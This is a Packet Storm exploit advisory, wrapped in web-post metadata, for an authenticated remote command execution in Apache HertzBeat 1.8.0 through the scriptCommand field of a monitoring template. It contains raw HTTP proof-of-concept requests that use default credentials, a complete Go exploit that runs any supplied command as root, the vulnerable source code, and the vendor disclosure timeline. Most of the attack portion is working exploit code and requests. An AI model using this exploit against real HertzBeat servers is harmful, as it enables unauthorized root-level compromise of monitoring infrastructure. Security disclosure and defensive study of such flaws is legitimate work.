{“lastseen”:”2026-05-14T16:31:56″,”description”:”Apache HertzBeat version 1.8.0 suffers from a remote command execution vulnerability via the scriptCommand parameter in a monitoring template definition…”,”published”:”2026-05-14T00:00:00″,”modified”:”2026-05-14T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Apache HertzBeat 1.8.0 Remote Command Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:221083″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# Exploit Title: Apache HertzBeat 1.8.0 – Remote Code Execution \\n # Google Dork: N\/A\\n # Date: 2026-03-09\\n # Exploit Author: Brett Gervasoni\\n # Vendor Homepage: https:\/\/hertzbeat.apache.org\/\\n # Software Link: https:\/\/github.com\/apache\/hertzbeat\/releases\\n # Version: 1.8.0\\n # Tested on: Linux (Docker; official HertzBeat image, uid=0 in container)\\n # CVE: N\/A\\n \\n ================================================================================\\n METADATA\\n ================================================================================\\n \\n Severity: CRITICAL\\n Impact: Arbitrary command execution via monitoring template (script protocol)\\n CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)\\n Product: Apache HertzBeat \u2014 https:\/\/hertzbeat.apache.org\/ (v1.8.0)\\n Affected Component: ScriptCollectImpl.collect()\\n Affected Endpoint: PUT \/api\/apps\/define\/yml\\n Authentication: Required (standard user or admin)\\n \\n Note: Apache Security does not classify this as a vulnerability; see HertzBeat\\n security model: https:\/\/hertzbeat.apache.org\/docs\/help\/security_model\/\\n \\n ================================================================================\\n VULNERABILITY SUMMARY\\n ================================================================================\\n \\n HertzBeat allows arbitrary OS commands to be executed via the scriptCommand\\n parameter in a monitoring template definition.\\n \\n An authenticated user can overwrite a monitoring template definition via\\n PUT \/api\/apps\/define\/yml. The \\”define\\” body contains YAML parsed into a Job.\\n When the YAML specifies protocol: script, the attacker-controlled scriptCommand\\n string is passed to ProcessBuilder (bash -c \\”\\u003ccommand\\u003e\\”) without sanitization.\\n \\n If the overwritten template has active monitoring instances, updateAppCollectJob()\\n re-dispatches them, triggering execution within seconds. If none exist, the\\n attacker can create one via POST \/api\/monitor to trigger immediate execution.\\n \\n The default Docker deployment runs the process as root (uid=0).\\n \\n ================================================================================\\n VULNERABLE CODE (REFERENCE)\\n ================================================================================\\n \\n Sink \u2014 ScriptCollectImpl.java (approx. lines 74\u2013114) \u2014 direct execution:\\n \\n public void collect(CollectRep.MetricsData.Builder builder, Metrics metrics) {\\n ScriptProtocol scriptProtocol = metrics.getScript();\\n \/\/ …\\n if (StringUtils.hasText(scriptProtocol.getScriptCommand())) {\\n switch (scriptProtocol.getScriptTool()) {\\n case BASH -\\u003e processBuilder = new ProcessBuilder(\\n BASH, BASH_C, scriptProtocol.getScriptCommand().trim()); \/\/ payload\\n \/\/ …\\n }\\n }\\n \/\/ …\\n Process process = processBuilder.start(); \/\/ executed\\n }\\n \\n YAML gadget blocking \u2014 AppController.java (approx. 55\u201359) \u2014 blocks SnakeYAML\\n gadget strings, not shell command injection:\\n \\n private static final String[] RISKY_STR_ARR = {\\”ScriptEngineManager\\”, \\”URLClassLoader\\”, \\”!!\\”,\\n \\”ClassLoader\\”, \\”AnnotationConfigApplicationContext\\”, \\”FileSystemXmlApplicationContext\\”,\\n \\”GenericXmlApplicationContext\\”, \\”GenericGroovyApplicationContext\\”, \\”GroovyScriptEngine\\”,\\n \\”GroovyClassLoader\\”, \\”GroovyShell\\”, \\”ScriptEngine\\”, \\”ScriptEngineFactory\\”,\\n \\”XmlWebApplicationContext\\”, \\”ClassPathXmlApplicationContext\\”, \\”MarshalOutputStream\\”,\\n \\”InflaterOutputStream\\”, \\”FileOutputStream\\”};\\n \\n ================================================================================\\n PROOF OF CONCEPT \u2014 RAW HTTP\\n ================================================================================\\n \\n Replace TARGET with the HertzBeat host. Default port is 1157. Example uses a\\n standard user \\”operator\\” \/ \\”hertzbeat\\” (user role); admin with default\\n password also works.\\n \\n — Step 1: Authenticate —\\n \\n POST \/api\/account\/auth\/form HTTP\/1.1\\n Host: TARGET:1157\\n Content-Type: application\/json\\n \\n {\\”type\\”:1,\\”identifier\\”:\\”operator\\”,\\”credential\\”:\\”hertzbeat\\”}\\n \\n Response: data.token (JWT) \u2014 use as Bearer below.\\n \\n — Step 2: Overwrite linux_script template —\\n \\n PUT \/api\/apps\/define\/yml HTTP\/1.1\\n Host: TARGET:1157\\n Authorization: Bearer \\u003cJWT\\u003e\\n Content-Type: application\/json\\n \\n {\\”define\\”:\\”app: linux_script\\\\ncategory: os\\\\nname:\\\\n en-US: Linux Script\\\\n zh-CN: Linux Script\\\\nparams:\\\\n – field: host\\\\n name:\\\\n en-US: Host\\\\n zh-CN: Host\\\\n type: host\\\\n required: true\\\\nmetrics:\\\\n – name: basic\\\\n i18n:\\\\n en-US: Basic\\\\n zh-CN: Basic\\\\n priority: 0\\\\n fields:\\\\n – field: result\\\\n type: 1\\\\n i18n:\\\\n en-US: Result\\\\n zh-CN: Result\\\\n protocol: script\\\\n script:\\\\n scriptTool: bash\\\\n charset: UTF-8\\\\n scriptCommand: id \\u003e \/tmp\/pwned\\\\n parseType: multiRow\\\\n\\”}\\n \\n Decoded define (YAML):\\n \\n app: linux_script\\n category: os\\n name:\\n en-US: Linux Script\\n zh-CN: Linux Script\\n params:\\n – field: host\\n name:\\n en-US: Host\\n zh-CN: Host\\n type: host\\n required: true\\n metrics:\\n – name: basic\\n i18n:\\n en-US: Basic\\n zh-CN: Basic\\n priority: 0\\n fields:\\n – field: result\\n type: 1\\n i18n:\\n en-US: Result\\n zh-CN: Result\\n protocol: script\\n script:\\n scriptTool: bash\\n charset: UTF-8\\n scriptCommand: id \\u003e \/tmp\/pwned\\n parseType: multiRow\\n \\n Expected response:\\n \\n HTTP\/1.1 200 OK\\n Content-Type: application\/json\\n \\n {\\”code\\”:0,\\”msg\\”:null,\\”data\\”:null}\\n \\n — Step 3: Create monitor (if no linux_script monitors exist) —\\n \\n POST \/api\/monitor HTTP\/1.1\\n Host: TARGET:1157\\n Authorization: Bearer \\u003cJWT\\u003e\\n Content-Type: application\/json\\n \\n {\\”monitor\\”:{\\”name\\”:\\”rce-test\\”,\\”app\\”:\\”linux_script\\”,\\”host\\”:\\”127.0.0.1\\”,\\”intervals\\”:30,\\”status\\”:1},\\”params\\”:[{\\”field\\”:\\”host\\”,\\”paramValue\\”:\\”127.0.0.1\\”,\\”type\\”:1}]}\\n \\n — Step 4: Verify (example: Docker) —\\n \\n docker exec hertzbeat cat \/tmp\/pwned\\n \\n Expected:\\n \\n uid=0(root) gid=0(root) groups=0(root)\\n \\n ================================================================================\\n EXPLOIT CODE \u2014 script_command_rce.go (Go)\\n ================================================================================\\n \\n package main\\n \\n import (\\n \\t\\”bytes\\”\\n \\t\\”encoding\/json\\”\\n \\t\\”fmt\\”\\n \\t\\”io\\”\\n \\t\\”math\/rand\\”\\n \\t\\”net\/http\\”\\n \\t\\”os\\”\\n \\t\\”strings\\”\\n )\\n \\n const target = \\”http:\/\/localhost:1157\\”\\n \\n type authResponse struct {\\n \\tCode int `json:\\”code\\”`\\n \\tData struct {\\n \\t\\tToken string `json:\\”token\\”`\\n \\t} `json:\\”data\\”`\\n }\\n \\n type apiResponse struct {\\n \\tCode int `json:\\”code\\”`\\n \\tMsg string `json:\\”msg\\”`\\n }\\n \\n func main() {\\n \\tif len(os.Args) \\u003c 2 {\\n \\t\\tfmt.Fprintf(os.Stderr, \\”Usage: %s \\u003ccommand\\u003e\\\\n\\”, os.Args[0])\\n \\t\\tfmt.Fprintf(os.Stderr, \\”Example: %s \\\\\\”id \\u003e \/tmp\/pwned\\\\\\”\\\\n\\”, os.Args[0])\\n \\t\\tos.Exit(1)\\n \\t}\\n \\tcmd := strings.Join(os.Args[1:], \\” \\”)\\n \\n \\tfmt.Println(\\”============================================================\\”)\\n \\tfmt.Println(\\” HertzBeat ScriptCollectImpl RCE\\”)\\n \\tfmt.Println(\\”============================================================\\”)\\n \\tfmt.Println()\\n \\n \\tfmt.Println(\\”[*] Authenticating…\\”)\\n \\n \\ttoken, err := authenticate()\\n \\tif err != nil {\\n \\t\\tfmt.Fprintf(os.Stderr, \\”[-] Auth failed: %v\\\\n\\”, err)\\n \\t\\tos.Exit(1)\\n \\t}\\n \\n \\tfmt.Printf(\\”[+] Got token: %s…\\\\n\\\\n\\”, token[:40])\\n \\n \\tfmt.Println(\\”[*] Overwriting linux_script template…\\”)\\n \\tfmt.Printf(\\” PUT \/api\/apps\/define\/yml\\\\n\\”)\\n \\tfmt.Printf(\\” scriptCommand: %s\\\\n\\”, cmd)\\n \\n \\terr = putMaliciousDefine(token, cmd)\\n \\tif err != nil {\\n \\t\\tfmt.Fprintf(os.Stderr, \\”[-] Failed to overwrite template: %v\\\\n\\”, err)\\n \\t\\tos.Exit(1)\\n \\t}\\n \\n \\tfmt.Println(\\”[+] Template overwritten.\\”)\\n \\tfmt.Println()\\n \\n \\tfmt.Println(\\”[*] Creating monitor instance to trigger collection…\\”)\\n \\tfmt.Println(\\” POST \/api\/monitor with app: linux_script\\”)\\n \\n \\terr = createMonitor(token)\\n \\tif err != nil {\\n \\t\\tfmt.Fprintf(os.Stderr, \\”[-] Failed to create monitor: %v\\\\n\\”, err)\\n \\t\\tfmt.Println(\\”[*] This may fail if a monitor already exists \u2014 checking anyway…\\”)\\n \\t} else {\\n \\t\\tfmt.Println(\\”[+] Monitor created.\\”)\\n \\t\\tfmt.Println()\\n \\t}\\n \\n \\tfmt.Println(\\”[+] Completed. If it wasn’t executed instantly, wait ~30 seconds for the collector.\\”)\\n \\tfmt.Printf(\\”[+] Command: %s\\\\n\\\\n\\”, cmd)\\n \\tfmt.Println(\\”[*] Verify with (assuming its running in docker locally):\\”)\\n \\tfmt.Println(\\” docker exec hertzbeat \\u003ccheck your payload\\u003e\\”)\\n }\\n \\n func authenticate() (string, error) {\\n \\tbody := `{\\”type\\”:1,\\”identifier\\”:\\”operator\\”,\\”credential\\”:\\”hertzbeat\\”}`\\n \\n \\tresp, err := http.Post(target+\\”\/api\/account\/auth\/form\\”, \\”application\/json\\”, bytes.NewBufferString(body))\\n \\tif err != nil {\\n \\t\\treturn \\”\\”, err\\n \\t}\\n \\n \\tdefer resp.Body.Close()\\n \\n \\tvar result authResponse\\n \\tif err := json.NewDecoder(resp.Body).Decode(\\u0026result); err != nil {\\n \\t\\treturn \\”\\”, err\\n \\t}\\n \\n \\tif result.Code != 0 || result.Data.Token == \\”\\” {\\n \\t\\treturn \\”\\”, fmt.Errorf(\\”unexpected response code %d\\”, result.Code)\\n \\t}\\n \\n \\treturn result.Data.Token, nil\\n }\\n \\n func putMaliciousDefine(token, command string) error {\\n \\tdefine := fmt.Sprintf(`app: linux_script\\n category: os\\n name:\\n en-US: Linux Script\\n zh-CN: Linux Script\\n params:\\n – field: host\\n name:\\n en-US: Host\\n zh-CN: Host\\n type: host\\n required: true\\n metrics:\\n – name: basic\\n i18n:\\n en-US: Basic\\n zh-CN: Basic\\n priority: 0\\n fields:\\n – field: result\\n type: 1\\n i18n:\\n en-US: Result\\n zh-CN: Result\\n protocol: script\\n script:\\n scriptTool: bash\\n charset: UTF-8\\n scriptCommand: \\”%s \\u0026\\u0026 echo result done\\”\\n parseType: multiRow\\n `, command)\\n \\n \\tpayload, _ := json.Marshal(map[string]string{\\”define\\”: define})\\n \\n \\treq, _ := http.NewRequest(\\”PUT\\”, target+\\”\/api\/apps\/define\/yml\\”, bytes.NewBuffer(payload))\\n \\treq.Header.Set(\\”Content-Type\\”, \\”application\/json\\”)\\n \\treq.Header.Set(\\”Authorization\\”, \\”Bearer \\”+token)\\n \\n \\tresp, err := http.DefaultClient.Do(req)\\n \\tif err != nil {\\n \\t\\treturn err\\n \\t}\\n \\n \\tdefer resp.Body.Close()\\n \\n \\trespBody, _ := io.ReadAll(resp.Body)\\n \\n \\tvar result apiResponse\\n \\tif err := json.Unmarshal(respBody, \\u0026result); err != nil {\\n \\t\\treturn fmt.Errorf(\\”HTTP %d: %s\\”, resp.StatusCode, string(respBody))\\n \\t}\\n \\n \\tif result.Code != 0 {\\n \\t\\treturn fmt.Errorf(\\”API error (code %d): %s\\”, result.Code, result.Msg)\\n \\t}\\n \\n \\treturn nil\\n }\\n \\n func createMonitor(token string) error {\\n \\tsuffix := randSuffix()\\n \\tname := fmt.Sprintf(\\”rce-poc-%s\\”, suffix)\\n \\tbody := fmt.Sprintf(`{\\”monitor\\”:{\\”name\\”:\\”%s\\”,\\”app\\”:\\”linux_script\\”,\\”host\\”:\\”127.0.0.1\\”,\\”intervals\\”:30,\\”status\\”:1},\\”params\\”:[{\\”field\\”:\\”host\\”,\\”paramValue\\”:\\”127.0.0.1\\”,\\”type\\”:1}]}`, name)\\n \\n \\treq, _ := http.NewRequest(\\”POST\\”, target+\\”\/api\/monitor\\”, bytes.NewBufferString(body))\\n \\treq.Header.Set(\\”Content-Type\\”, \\”application\/json\\”)\\n \\treq.Header.Set(\\”Authorization\\”, \\”Bearer \\”+token)\\n \\n \\tresp, err := http.DefaultClient.Do(req)\\n \\tif err != nil {\\n \\t\\treturn err\\n \\t}\\n \\n \\tdefer resp.Body.Close()\\n \\n \\trespBody, _ := io.ReadAll(resp.Body)\\n \\tvar result apiResponse\\n \\tif err := json.Unmarshal(respBody, \\u0026result); err != nil {\\n \\t\\treturn fmt.Errorf(\\”HTTP %d: %s\\”, resp.StatusCode, string(respBody))\\n \\t}\\n \\n \\tif result.Code != 0 {\\n \\t\\treturn fmt.Errorf(\\”API error (code %d): %s\\”, result.Code, result.Msg)\\n \\t}\\n \\treturn nil\\n }\\n \\n func randSuffix() string {\\n \\tconst chars = \\”abcdefghijklmnopqrstuvwxyz0123456789\\”\\n \\tb := make([]byte, 8)\\n \\n \\tfor i := range b {\\n \\t\\tb[i] = chars[rand.Intn(len(chars))]\\n \\t}\\n \\n \\treturn string(b)\\n }\\n \\n ================================================================================\\n NOTES\\n ================================================================================\\n \\n – A standard user (e.g. operator:hertzbeat, user role) is sufficient; admin is\\n not required for the described flow.\\n – A new custom app name (e.g. app: rce_custom) can be registered with POST\\n instead of PUT to avoid overwriting an existing definition; then create a\\n monitor for that app.\\n \\n ================================================================================\\n DISCLOSURE \/ VENDOR RESPONSE (SUMMARY)\\n ================================================================================\\n \\n Apache Security indicated this aligns with the documented security model: only\\n trusted operators should receive accounts; customization is intentional.\\n Role-based permission controls are still evolving; see vendor documentation.\\n \\n Reporting timeline:\\n – 2026-02-19: Reported to Apache Security\\n – 2026-02-19 to 2026-03-04: Discussion on post-authentication issues\\n – 2026-03-04: Apache position communicated (risk accepted per security model)\\n – 2026-03-09: Public advisory”,”sourceHref”:”https:\/\/packetstorm.news\/download\/221083″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/221083\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-14T16:31:56″,”description”:”Apache HertzBeat version 1.8.0 suffers from a remote command execution vulnerability via the scriptCommand parameter in a monitoring template definition…”,”published”:”2026-05-14T00:00:00″,”modified”:”2026-05-14T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Apache HertzBeat 1.8.0 Remote Command…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-54573","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n